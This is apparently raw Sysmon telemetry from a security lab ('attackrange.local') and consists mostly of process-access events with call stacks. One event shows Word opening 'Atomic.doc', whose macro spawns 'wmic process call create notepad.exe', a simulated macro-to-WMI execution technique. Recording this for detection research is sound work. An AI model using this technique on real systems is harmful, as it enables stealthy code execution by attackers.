12:25:32.992{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293137Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.992{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293136Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.960{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293135Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.960{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293134Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293133Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293132Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293131Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293130Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293129Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293128Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293127Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293126Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1E2A-00000000BB01}6288C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293125Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1E2A-00000000BB01}6288C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293124Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1E2A-00000000BB01}6288C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293123Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02BC-6088-1E2A-00000000BB01}6288C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293122Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02BC-6088-1E2A-00000000BB01}6288C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293121Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02BC-6088-1E2A-00000000BB01}6288C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293120Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.945{BEA10069-02BC-6088-1E2A-00000000BB01}62881804C:\Windows\system32\conhost.exe{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293119Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.940{BEA10069-D4AB-6086-4301-00000000BB01}33844212C:\Windows\system32\csrss.exe{BEA10069-02BC-6088-1E2A-00000000BB01}6288C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293118Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.923{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293117Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.923{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293116Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.923{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293115Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.923{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293114Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.923{BEA10069-D4AB-6086-4301-00000000BB01}33842096C:\Windows\system32\csrss.exe{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293113Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.923{BEA10069-02A1-6088-112A-00000000BB01}65686164C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL+100e92|UNKNOWN(00000145103363F2) 154100x8000000000000000293112Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.931{BEA10069-02BC-6088-1D2A-00000000BB01}5796C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic process call create notepad.exeC:\Users\Administrator\Downloads\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Administrator\Downloads\Atomic.doc" /o "" 10341000x8000000000000000293111Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.923{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000293110Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:30.373{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50660-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000293109Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.876{BEA10069-D0C2-6086-1000-00000000BB01}944NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\DeviceMetadataCache\OLDCACHE.000MD5=A5B5D717C4269F6C0EE8C788FA6C34FB,SHA256=5BEB00EC6377B51BEE56669FCB69648734270301147093891EA7BC85FC63E8F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293108Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.077{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB8ED71E9D97F84FBBA057517562F033,SHA256=908A2E9F292397C525F2D21824E097057516FA1959E452069C70ECACDB174233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293107Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:32.077{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A3AC6DFEDC428D44B99F708D4C5F040,SHA256=3A03A550C7DD336C5F39B49FDB2DAD78401533413081BA6C70EB28CDD6A11EF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441496Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:32.258{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441495Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 